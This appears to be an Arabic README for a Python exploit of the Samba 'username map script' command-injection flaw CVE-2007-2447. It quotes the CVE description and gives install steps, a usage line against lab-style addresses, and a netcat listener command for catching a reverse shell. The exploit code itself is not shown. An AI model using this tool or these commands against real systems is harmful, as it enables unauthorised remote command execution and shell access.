
استغلال بلغة بايثون لثغرة CVE-2007-2447 التي تستهدف ثغرة برنامج نصي لخريطة اسم المستخدم في Samba، مما يتيح تنفيذ أوامر عن بُعد عبر حروف وصفات الصدفة مع تسليم حمولة شل عكسية.
"وظيفة MS-RPC في smbd في Samba من الإصدار 3.0.0 إلى 3.0.25rc3 تسمح للمهاجمين عن بُعد بتنفيذ أوامر عشوائية عبر محارف shell في دالة (1) SamrChangePassword، عندما يكون خيار "username map script" في smb.conf مفعلاً، وتسمح للمستخدمين الموثّقين عن بُعد بتنفيذ أوامر عبر محارف shell في دوال MS-RPC الأخرى في (2) إدارة الطابعات عن بُعد و(3) مشاركة الملفات."
[*] يتطلب هذا الاستغلال Python 3.7 أو أعلى
python3 -m pip install pysmb
$ ./CVE-2007-2447.py --rhost 10.10.10.3 --lhost 10.10.14.10 --lport 4444 --rport 445
--rhost -- المضيف البعيد--lhost -- المضيف المحلي--lport -- المنفذ المحلي--rport -- المنفذ البعيد *[ ] اختياري. الافتراضي=445لا تنسَ تشغيل المستمع الخاص بك:
nc -lvnp 4444
